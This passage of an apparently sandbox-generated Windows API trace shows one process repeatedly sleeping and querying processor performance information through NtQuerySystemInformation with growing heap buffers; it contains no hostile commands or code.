Sleep (dwMilliseconds=0x110) [0269.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0269.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0269.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0269.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0269.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0269.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0269.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0269.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0269.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.380] Sleep (dwMilliseconds=0x110) [0269.696] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0269.696] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.696] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0269.696] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0269.696] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.697] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0269.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0269.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0269.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0269.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0269.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.705] Sleep (dwMilliseconds=0x110) [0269.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0269.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0269.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0269.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0269.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0269.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0269.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0269.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0269.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.737] Sleep (dwMilliseconds=0x110) [0269.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0269.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0269.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0269.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0269.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0269.755] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0269.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0269.755] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.756] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0269.756] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.757] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.757] Sleep (dwMilliseconds=0x110) [0269.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0269.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0269.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0269.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0269.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0269.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0269.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0269.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0269.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.768] Sleep (dwMilliseconds=0x110) [0269.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0269.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0269.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0269.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0269.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0269.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0269.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0269.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0269.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.786] Sleep (dwMilliseconds=0x110) [0269.824] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0269.824] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0269.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0269.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0269.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0269.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0269.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0269.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0269.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.831] Sleep (dwMilliseconds=0x110) [0269.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0269.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0269.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0269.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0269.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0269.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0269.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0269.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0269.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.849] Sleep (dwMilliseconds=0x110) [0269.867] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0269.867] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.870] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0269.871] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0269.871] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.871] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0269.871] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0269.871] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.872] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0269.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0269.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0269.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.874] Sleep (dwMilliseconds=0x110) [0269.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0269.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0269.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0269.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0269.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0269.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0269.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0269.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0269.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.894] Sleep (dwMilliseconds=0x110) [0269.946] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0269.946] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.947] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0269.947] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0269.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0269.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0269.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0269.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0269.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0269.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.955] Sleep (dwMilliseconds=0x110) [0269.975] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0269.975] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.976] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0269.976] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0269.976] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.976] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0269.976] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0269.976] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.977] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0269.981] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0269.981] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0269.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.983] Sleep (dwMilliseconds=0x110) [0270.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0270.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0270.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0270.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0270.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0270.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0270.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0270.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0270.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0270.007] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0270.008] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0270.008] Sleep (dwMilliseconds=0x110) [0270.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0270.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0270.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0270.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0270.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0270.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0270.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0270.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0270.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0270.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0270.020] RtlAllocateHeap (HeapHandle=0x2560000, 